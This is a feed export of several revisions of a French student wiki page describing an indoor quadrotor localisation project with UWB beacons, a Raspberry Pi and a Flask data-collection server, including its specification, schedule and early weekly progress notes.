|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Avancement du Projet'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Phase préparatoire'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 21/09/17 - Ven 22/09/17]]'' &lt;br /&gt;
*Rendez-vous de mise au point du cahier des charges avec les encadrants/intervenants (M. ZHENG Gang et M. DAGHER Roudy)&lt;br /&gt;
*Elaboration du cahier des charges&lt;br /&gt;
*Elaboration de la page Wiki (préparation de la mise en page et présentation du sujet)&lt;br /&gt;
*Préparation du travail sous forme de Mind Map&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 1'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 28/09/17 - Ven 29/09/17]]'' &lt;br /&gt;
*Revue du Cahier des Charges avec les encadrants&lt;br /&gt;
*Lecture et recherches sur les technologies adaptées&lt;br /&gt;
*Construction de la suite de la Mind Map&lt;br /&gt;
*Création du Gitlab&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 2'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 05/10/17 - Ven 06/10/17]]''  &lt;br /&gt;
*Précisions sur le cahier des charges&lt;br /&gt;
*Listage du matériel&lt;br /&gt;
*Recherche et détermination de solutions technologiques possibles pour les fonctions demandées&lt;br /&gt;
*Début du travail sur le serveur de collecte&lt;br /&gt;
*Apprentissage du langage Python et de l'utilisation du framework Flask&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 3'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Mer 11/10/17 - Jeu 12/10/17]]''  &lt;br /&gt;
*Recherche et développement initial du serveur de collecte de données&lt;br /&gt;
*Complément du Git sur les tâches à effectuer&lt;br /&gt;
&lt;br /&gt;
Nous avons commencé à créer un serveur flask renvoyant pour l'instant une matrice aléatoire. Lors de la requete URL &amp;quot;../matrice&amp;quot;, nous voyons bien une matrice aléatoire apparaitre sur la page WEB. Nous essayons de nous connecter à la Raspberry pi en redirigeant sont port série vers le Bluetooth de façon à récupérer de vrai matrices de distance entre le drone et les balises. Nous pourrons afficher ensuite ces matrices ou alors les stocker dans un fichier en attendant le traitement de celle ci.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Requete s3.PNG|300px|serveur flask]]&lt;br /&gt;
&lt;br /&gt;
Nous avons plusieurs problème avec le Bluetooth pour se connecter avec la Raspberry pi. Quand nous aurons réussi à nous connecter au port série de la Raspberry pi alors nous pour gérer le traitement des données récupérées.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 4'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 19/10/17 - Ven 20/10/17]]''  &lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 5'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 26/10/17 - Ven 27/10/17]]''  &lt;br /&gt;
*&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45701</id>
		<title>P18 Localisation of quadrotors</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45701"/>
				<updated>2017-10-18T09:23:40Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Semaine 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Cahier des charges'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Présentation générale du projet&amp;lt;/span&amp;gt;=== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Contexte&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Dans un monde de plus en plus connecté, de nombreux drones sont déployés pour diverses applications comme l'espionnage, la surveillance, la cartographie de lieux et la livraison de colis. Les technologies nécessaires pour contrôler ces drones sont des sujets de recherche actuels. &lt;br /&gt;
&lt;br /&gt;
Le contrôle de ceux-ci passe tout d'abord par la maîtrise de leur position dans l'espace. Le développement des applications liées à l'utilisation de drones nécessite un travail important sur la localisation spatiale d'objets connectés. &lt;br /&gt;
&lt;br /&gt;
De plus, dans un souci d'utilisation, il est essentiel de développer des interfaces logicielles permettant d'exploiter ces données.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Objectif du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce projet est de développer une interface logicielle permettant de traiter en temps réel les informations de localisation d'un drone et de balises, dans le but de définir leur localisation dans l'espace, en intérieur.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Description du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le contrôle de drones, la première étape importante est de donner ses informations de position. Le but du projet est de développer une interface logicielle permettant de localiser le drone en temps réel en intérieur. Le drone se déplace dans un environnement dans lequel ont été installées de multiples balises. Il est équipé d'une carte, lui permettant de recevoir les distances relatives entre lui-même et les balises, sur laquelle différents algorithmes vont être implémentés pour effectuer la localisation en temps réel. Le projet requiert des compétences en développement hardware (Crazyflie 2.0, voir https://wiki.bitcraze.io/) et software (langage C/C++/Python/Javascript/HTML...).&lt;br /&gt;
&lt;br /&gt;
Il se divise en 4 étapes principales, qui sont:&lt;br /&gt;
*1) Choisir les technologies utilisées&lt;br /&gt;
*2) Choisir l'architecture (OS / APIs)&lt;br /&gt;
*3) Développer les différentes parties du projet&lt;br /&gt;
*4) Intégrer et connecter les différentes parties du projet&lt;br /&gt;
&lt;br /&gt;
La localisation étant en intérieur, le protocole GPS n'est donc pas assez précis pour les applications ciblées. La mise en place d'un tel dispositif permettrait grâce à l'utilisation d'un algorithme d'estimer avec une bonne précision les positions en intérieur d'une balise centrale (appelée Tag) et de balises (appelées Anchor). Le Tag scanne en temps réel la distance relative aux différentes balises, et il nous est retourné la position des balises et du Tag grâce à l'algorithme de localisation.&lt;br /&gt;
&lt;br /&gt;
Le projet se compose de 3 parties:&lt;br /&gt;
* Collect &amp;amp; parse: collecter les données envoyées par les balises en communiquant avec un serveur et récupérer les données adéquates par un tri&lt;br /&gt;
* Localise: déterminer la matrice de position des balises et du Tag en traitant les données récupérées&lt;br /&gt;
* Display: développer l'interface homme machine pour afficher, étudier et utiliser les données traitées&lt;br /&gt;
&lt;br /&gt;
Nous travaillerons dans un premier temps dans une optique temps différé avant de travailler en temps réel. Cela nous permettra d'acquérir des données utiles et réutilisables en aval. &lt;br /&gt;
&lt;br /&gt;
A l'aboutissement du projet, nous devrions être capable via l'interface homme machine développée d'afficher précisément la position spatiale des balises ainsi que du Tag, grâce àl'utilisation d'un algorithme de localisation et des données récupérées, et d'afficher d'autres données relatives au déplacement du Tag ou des balises dans l'espace. &lt;br /&gt;
&lt;br /&gt;
Si le temps le permet, nous pourrons aussi être amenés à adapter et utiliser l'interface développée pour l'utilisation d'un drone.&lt;br /&gt;
&lt;br /&gt;
''Sujet originel''&lt;br /&gt;
&lt;br /&gt;
To achieve the control of quadrotors, the first important task to give its position information. This project is to develop a software(GUI) to localize the quadrotors in real-time. The quadrotor is flying in an environment where several transmitters have been installed. The quadrotor is equipped with a deck to receive the relative distances between the deck and all transmitters, based on which different algorithms will be implemented to realize the real-time localization. The candidates need to have both experiences on hardware (Crazyflie 2.0, see https://wiki.bitcraze.io/) and software development (C/C , Python…). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Calendrier&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
''[[Avant le 29/09/17]]'' - Élaboration du Cahier des charges, de la liste des tâches et du calendrier prévisionnel&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Octobre]]'' - Serveur de collecte et début du développement de l'interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Décembre]]'' - Interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[A la fin du PFE]]'' - Intégration finale des différentes parties (Serveur de collecte des données &amp;amp; Serveur de localisation &amp;amp; Interface logicielle)&lt;br /&gt;
&lt;br /&gt;
Répartition du volume de travail (***h):&lt;br /&gt;
&lt;br /&gt;
* Recherche sur les technologies à utiliser (**h)&lt;br /&gt;
* Développement du serveur de collecte de données (**h)&lt;br /&gt;
* Réalisation de l'interface logicielle (Web//Logiciel/Application) (**h)&lt;br /&gt;
* Intégration des différentes parties (**h)&lt;br /&gt;
* Test et débuggage (**h)&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix techniques : matériel et logiciel&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Afin de développer ce dispositif, nous allons utiliser une Raspberry Pi 3 associée à une carte réceptrice, qui communique avec 4 balises composées chacune d'un microcontrôleur et d'une carte émettrice radio (UWB5C) et alimentées par batteries. La carte réceptrice joue le rôle du drone à localiser et communiquera les données émises par les balises vers l'ordinateur via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix technologiques&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Voici les technologies que nous utilisons pour chacune des parties de ce projet.&lt;br /&gt;
&lt;br /&gt;
    1) Serveur de collecte des données:&lt;br /&gt;
       Scanne et parse les données récupérées pour fournir la matrice D des distances relatives du tag aux 4 balises&lt;br /&gt;
        - API&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    2) Serveur de localisation (fourni):&lt;br /&gt;
       Calcule grâce à l'algorithme de localisation et la matrice D les positions spatiales des 4 noeuds et du tag&lt;br /&gt;
        - API&lt;br /&gt;
        - Bootstrap&lt;br /&gt;
        - Jquery&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    3) Interface utilisateur:&lt;br /&gt;
       Affiche courbes, visualisation 3D, boutons ou données des fichiers envoyées par le serveur de localisation&lt;br /&gt;
        - HTML5 / Javascript&lt;br /&gt;
        - Fichiers JSON (serveurs de collecte et de localisation)&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Calendrier prévisionnel'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Liste des tâches à effectuer&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
# Se documenter sur le projet&lt;br /&gt;
##Langages et technologies utilisées&lt;br /&gt;
##Matériel utilisé&lt;br /&gt;
##Mettre en place du travail sur le Git&lt;br /&gt;
# Réaliser le serveur de collecte&lt;br /&gt;
##Récupérer les trames envoyées par bluetooth par le TAG via la Raspberry Pi&lt;br /&gt;
##Intégrer le serveur de localisation pour interpréter les trames&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
# Réaliser l'interface Web utilisateur&lt;br /&gt;
##Implémenter le serveur de collecte et de localisation&lt;br /&gt;
##Afficher et traiter les données stockées dans les fichiers JSON via le serveur (temps différé + temps réel)&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Feuille d'heures'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Tâche !! Prélude !! Heures S1 !! Heures S2 !! Heures S3 !! Heures S4 !! Heures S5 !! Heures S6 !! Heures S7 !! Heures S8 !! Heures S9 !! Heures S10 !! Heures S11 !! Heures S12 !! Après Noël !! Total&lt;br /&gt;
|-&lt;br /&gt;
| Cahier des charges / Wiki / Gitlab&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur les technos utilisées&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur le matériel&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement du serveur de collecte&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement de l'interface Web&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et intégration du serveur de localisation&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Intégration des différentes parties&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Tests et débuggage&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Optimisation/Correction des programmes&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Avancement du Projet'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Phase préparatoire'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 21/09/17 - Ven 22/09/17]]'' &lt;br /&gt;
*Rendez-vous de mise au point du cahier des charges avec les encadrants/intervenants (M. ZHENG Gang et M. DAGHER Roudy)&lt;br /&gt;
*Elaboration du cahier des charges&lt;br /&gt;
*Elaboration de la page Wiki (préparation de la mise en page et présentation du sujet)&lt;br /&gt;
*Préparation du travail sous forme de Mind Map&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 1'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 28/09/17 - Ven 29/09/17]]'' &lt;br /&gt;
*Revue du Cahier des Charges avec les encadrants&lt;br /&gt;
*Lecture et recherches sur les technologies adaptées&lt;br /&gt;
*Construction de la suite de la Mind Map&lt;br /&gt;
*Création du Gitlab&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 2'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 05/10/17 - Ven 06/10/17]]''  &lt;br /&gt;
*Précisions sur le cahier des charges&lt;br /&gt;
*Listage du matériel&lt;br /&gt;
*Recherche et détermination de solutions technologiques possibles pour les fonctions demandées&lt;br /&gt;
*Début du travail sur le serveur de collecte&lt;br /&gt;
*Apprentissage du langage Python et de l'utilisation du framework Flask&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 3'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Mer 11/10/17 - Jeu 12/10/17]]''  &lt;br /&gt;
*Recherche et développement initial du serveur de collecte de données&lt;br /&gt;
*Complément du Git sur les tâches à effectuer&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Requete s3.PNG|300px|serveur flask]]Nous avons commencé à créer un serveur flask renvoyant pour l'instant une matrice aléatoire. Lors de la requete URL &amp;quot;../matrice&amp;quot;, nous voyons bien une matrice aléatoire apparaitre sur la page WEB. Nous essayons de nous connecter à la Raspberry pi en redirigeant sont port série vers le Bluetooth de façon à récupérer de vrai matrices de distance entre le drone et les balises. Nous pourrons afficher ensuite ces matrices ou alors les stocker dans un fichier en attendant le traitement de celle ci.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons plusieurs problème avec le Bluetooth pour se connecter avec la Raspberry pi. Quand nous aurons réussi à nous connecter au port série de la Raspberry pi alors nous pour gérer le traitement des données récupérées.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 4'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 19/10/17 - Ven 20/10/17]]''  &lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 5'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 26/10/17 - Ven 27/10/17]]''  &lt;br /&gt;
*&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45700</id>
		<title>P18 Localisation of quadrotors</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P18_Localisation_of_quadrotors&amp;diff=45700"/>
				<updated>2017-10-18T09:23:15Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Semaine 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Cahier des charges'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Présentation générale du projet&amp;lt;/span&amp;gt;=== &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Contexte&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Dans un monde de plus en plus connecté, de nombreux drones sont déployés pour diverses applications comme l'espionnage, la surveillance, la cartographie de lieux et la livraison de colis. Les technologies nécessaires pour contrôler ces drones sont des sujets de recherche actuels. &lt;br /&gt;
&lt;br /&gt;
Le contrôle de ceux-ci passe tout d'abord par la maîtrise de leur position dans l'espace. Le développement des applications liées à l'utilisation de drones nécessite un travail important sur la localisation spatiale d'objets connectés. &lt;br /&gt;
&lt;br /&gt;
De plus, dans un souci d'utilisation, il est essentiel de développer des interfaces logicielles permettant d'exploiter ces données.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Objectif du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce projet est de développer une interface logicielle permettant de traiter en temps réel les informations de localisation d'un drone et de balises, dans le but de définir leur localisation dans l'espace, en intérieur.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Description du projet&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Pour réaliser le contrôle de drones, la première étape importante est de donner ses informations de position. Le but du projet est de développer une interface logicielle permettant de localiser le drone en temps réel en intérieur. Le drone se déplace dans un environnement dans lequel ont été installées de multiples balises. Il est équipé d'une carte, lui permettant de recevoir les distances relatives entre lui-même et les balises, sur laquelle différents algorithmes vont être implémentés pour effectuer la localisation en temps réel. Le projet requiert des compétences en développement hardware (Crazyflie 2.0, voir https://wiki.bitcraze.io/) et software (langage C/C++/Python/Javascript/HTML...).&lt;br /&gt;
&lt;br /&gt;
Il se divise en 4 étapes principales, qui sont:&lt;br /&gt;
*1) Choisir les technologies utilisées&lt;br /&gt;
*2) Choisir l'architecture (OS / APIs)&lt;br /&gt;
*3) Développer les différentes parties du projet&lt;br /&gt;
*4) Intégrer et connecter les différentes parties du projet&lt;br /&gt;
&lt;br /&gt;
La localisation étant en intérieur, le protocole GPS n'est donc pas assez précis pour les applications ciblées. La mise en place d'un tel dispositif permettrait grâce à l'utilisation d'un algorithme d'estimer avec une bonne précision les positions en intérieur d'une balise centrale (appelée Tag) et de balises (appelées Anchor). Le Tag scanne en temps réel la distance relative aux différentes balises, et il nous est retourné la position des balises et du Tag grâce à l'algorithme de localisation.&lt;br /&gt;
&lt;br /&gt;
Le projet se compose de 3 parties:&lt;br /&gt;
* Collect &amp;amp; parse: collecter les données envoyées par les balises en communiquant avec un serveur et récupérer les données adéquates par un tri&lt;br /&gt;
* Localise: déterminer la matrice de position des balises et du Tag en traitant les données récupérées&lt;br /&gt;
* Display: développer l'interface homme machine pour afficher, étudier et utiliser les données traitées&lt;br /&gt;
&lt;br /&gt;
Nous travaillerons dans un premier temps dans une optique temps différé avant de travailler en temps réel. Cela nous permettra d'acquérir des données utiles et réutilisables en aval. &lt;br /&gt;
&lt;br /&gt;
A l'aboutissement du projet, nous devrions être capable via l'interface homme machine développée d'afficher précisément la position spatiale des balises ainsi que du Tag, grâce àl'utilisation d'un algorithme de localisation et des données récupérées, et d'afficher d'autres données relatives au déplacement du Tag ou des balises dans l'espace. &lt;br /&gt;
&lt;br /&gt;
Si le temps le permet, nous pourrons aussi être amenés à adapter et utiliser l'interface développée pour l'utilisation d'un drone.&lt;br /&gt;
&lt;br /&gt;
''Sujet originel''&lt;br /&gt;
&lt;br /&gt;
To achieve the control of quadrotors, the first important task to give its position information. This project is to develop a software(GUI) to localize the quadrotors in real-time. The quadrotor is flying in an environment where several transmitters have been installed. The quadrotor is equipped with a deck to receive the relative distances between the deck and all transmitters, based on which different algorithms will be implemented to realize the real-time localization. The candidates need to have both experiences on hardware (Crazyflie 2.0, see https://wiki.bitcraze.io/) and software development (C/C , Python…). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Calendrier&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
''[[Avant le 29/09/17]]'' - Élaboration du Cahier des charges, de la liste des tâches et du calendrier prévisionnel&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Octobre]]'' - Serveur de collecte et début du développement de l'interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[Avant fin Décembre]]'' - Interface logicielle&lt;br /&gt;
&lt;br /&gt;
''[[A la fin du PFE]]'' - Intégration finale des différentes parties (Serveur de collecte des données &amp;amp; Serveur de localisation &amp;amp; Interface logicielle)&lt;br /&gt;
&lt;br /&gt;
Répartition du volume de travail (***h):&lt;br /&gt;
&lt;br /&gt;
* Recherche sur les technologies à utiliser (**h)&lt;br /&gt;
* Développement du serveur de collecte de données (**h)&lt;br /&gt;
* Réalisation de l'interface logicielle (Web//Logiciel/Application) (**h)&lt;br /&gt;
* Intégration des différentes parties (**h)&lt;br /&gt;
* Test et débuggage (**h)&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix techniques : matériel et logiciel&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Afin de développer ce dispositif, nous allons utiliser une Raspberry Pi 3 associée à une carte réceptrice, qui communique avec 4 balises composées chacune d'un microcontrôleur et d'une carte émettrice radio (UWB5C) et alimentées par batteries. La carte réceptrice joue le rôle du drone à localiser et communiquera les données émises par les balises vers l'ordinateur via Bluetooth.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Choix technologiques&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Voici les technologies que nous utilisons pour chacune des parties de ce projet.&lt;br /&gt;
&lt;br /&gt;
    1) Serveur de collecte des données:&lt;br /&gt;
       Scanne et parse les données récupérées pour fournir la matrice D des distances relatives du tag aux 4 balises&lt;br /&gt;
        - API&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    2) Serveur de localisation (fourni):&lt;br /&gt;
       Calcule grâce à l'algorithme de localisation et la matrice D les positions spatiales des 4 noeuds et du tag&lt;br /&gt;
        - API&lt;br /&gt;
        - Bootstrap&lt;br /&gt;
        - Jquery&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    3) Interface utilisateur:&lt;br /&gt;
       Affiche courbes, visualisation 3D, boutons ou données des fichiers envoyées par le serveur de localisation&lt;br /&gt;
        - HTML5 / Javascript&lt;br /&gt;
        - Fichiers JSON (serveurs de collecte et de localisation)&lt;br /&gt;
&lt;br /&gt;
